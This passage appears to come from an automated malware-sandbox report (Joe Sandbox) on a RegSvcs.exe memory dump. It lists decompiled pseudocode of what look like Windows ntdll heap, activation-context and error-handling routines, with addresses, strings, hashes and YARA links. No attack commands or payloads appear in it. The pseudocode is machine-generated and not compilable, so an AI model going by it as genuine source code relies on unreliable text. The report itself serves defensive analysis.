									if(_t31 != 0) {
										L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00A64620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00a51b8f
0x00a51b9a
0x00a51b9c
0x00a51b9e
0x00a51ba3
0x00aa7010
0x00aa7010
0x00000000
0x00a51ba9
0x00a51ba9
0x00a51bae
0x00000000
0x00a51bc5
0x00a51bca
0x00a51bcf
0x00a51bd0
0x00a51bd1
0x00a51bd2
0x00a51bd6
0x00a51bdc
0x00a51be0
0x00aa6ffc
0x00aa7000
0x00000000
0x00aa7006
0x00aa7009
0x00aa7009
0x00a51be6
0x00a51bec
0x00a51c0b
0x00a51c0b
0x00a51c0c
0x00a51c11
0x00a51c12
0x00a51c15
0x00a51c1b
0x00a51c1f
0x00a51c31
0x00a51c33
0x00aa7026
0x00aa7026
0x00a51c21
0x00a51c24
0x00a51c24
0x00a51bee
0x00a51bee
0x00a51bf2
0x00a51c3a
0x00a51bf4
0x00a51bf4
0x00a51c05
0x00a51c05
0x00a51c09
0x00a51c3e
0x00000000
0x00000000
0x00000000
0x00a51c09
0x00a51bec
0x00a51be0
0x00a51bae
0x00a51c2e

Strings

WindowsExcludedProcs, xrefs: 00A51BC5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 18e0fac15b4a194dd1d9ed6fbef7a9d66fceee5651b54eba40068c4eda20a2d5
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: D821F237580228ABDB219B59C940F6FB7BDBF42B52F164425FD049B200D635DC04D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A6F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x00a6f71d
0x00a6f722
0x00a6f726
0x00ab4770
0x00a6f765
0x00a6f769
0x00a6f769
0x00a6f732
0x00ab477a
0x00000000
0x00ab477a
0x00a6f738
0x00a6f73a
0x00a6f73c
0x00a6f73f
0x00a6f746
0x00a6f778
0x00a6f7a9
0x00a6f7a9
0x00a6f754
0x00a6f75a
0x00a6f75d
0x00a6f75f
0x00a6f761
0x00a6f76f
0x00a6f771
0x00a6f771
0x00a6f76f
0x00a6f763
0x00000000
0x00a6f763
0x00a6f77d
0x00a6f7a3
0x00a6f7a5
0x00000000
0x00a6f7a5
0x00a6f77f
0x00a6f782
0x00a6f784
0x00a6f786
0x00000000
0x00000000
0x00000000
0x00a6f788
0x00a6f748
0x00a6f74d
0x00a6f78d
0x00a6f793
0x00a6f7b7
0x00a6f7bc
0x00000000
0x00a6f7bc
0x00a6f798
0x00000000
0x00000000
0x00a6f79d
0x00a6f7b0
0x00000000
0x00a6f7b0
0x00a6f79f
0x00000000
0x00a6f74f
0x00a6f74f
0x00000000
0x00a6f74f

Strings

Actx , xrefs: 00A6F73F

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 3412cd09c8b43d357dd4bddbd09287dddf771303f408e57243bda167874545e4
Instruction ID: c92d05b2c6b35210244cd7521773044c545083de24fde57e266c8dce16d6aa5b
Opcode Fuzzy Hash: 3412cd09c8b43d357dd4bddbd09287dddf771303f408e57243bda167874545e4
Instruction Fuzzy Hash: 0611BF35B086028FEB244F1DB99177672BAFB96724F34453AE862CB392DB70CC409340

Uniqueness

Uniqueness Score: -1.00%

Function 00AF8DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00AF8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xb20d50);
				E00A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00AD5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00A9DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00A9DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00A9D130(_t34, _t39, _t40);
			}

0x00af8df1
0x00af8df1
0x00af8df1
0x00af8df1
0x00af8df1
0x00af8df1
0x00af8df3
0x00af8df8
0x00af8dfd
0x00af8e00
0x00af8e0e
0x00af8e2a
0x00af8e36
0x00af8e38
0x00af8e3c
0x00af8e46
0x00af8e46
0x00af8e36
0x00af8e50
0x00af8e56
0x00af8e59
0x00af8e5c
0x00af8e60
0x00af8e67
0x00af8e6d
0x00af8e73
0x00af8e74
0x00af8eb1
0x00af8ebd

Strings

Critical error detected %lx, xrefs: 00AF8E21

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 84f0c93b2ecf745ac4e696150af0f30d2589128bc551468634adc570097baf6b
Instruction ID: 456f76f081c7ce578f4d57058b06d006e67b6a4c7e8335c58dc5762174322b00
Opcode Fuzzy Hash: 84f0c93b2ecf745ac4e696150af0f30d2589128bc551468634adc570097baf6b
Instruction Fuzzy Hash: E5115B75D15348DADF24DFA8D6067ACBBF0BB04714F20425EE529AB292C7744A01CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00ADFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00ADFF60

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 0a2f6236e272db048b621461d524de7bb13da40af2a549e32a1e292705f49623
Instruction ID: 04499474d8c0f596a890ff1465de4285c2e988dff9fa73d6b4dd49052e16dffa
Opcode Fuzzy Hash: 0a2f6236e272db048b621461d524de7bb13da40af2a549e32a1e292705f49623
Instruction Fuzzy Hash: A711A172A50544EFDF25DF50CE4AF9DB7B1FB08705F248455F50A672A2CB399980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B15BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B15BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xb21178);
				E00A9D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00B14C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00A8D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00B15542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xb360e8;
								if( *0xb360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xb360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00A89710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00A86DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00A8F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00A8F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00A8F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00A8FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00A8FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00A8F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00A8F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E00B14CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E00A9D130(_t427, _t494, _t511);
				}
			}

0x00b15ba5
0x00b15baa
0x00b15baf
0x00b15bb4
0x00b15bb6
0x00b15bbc
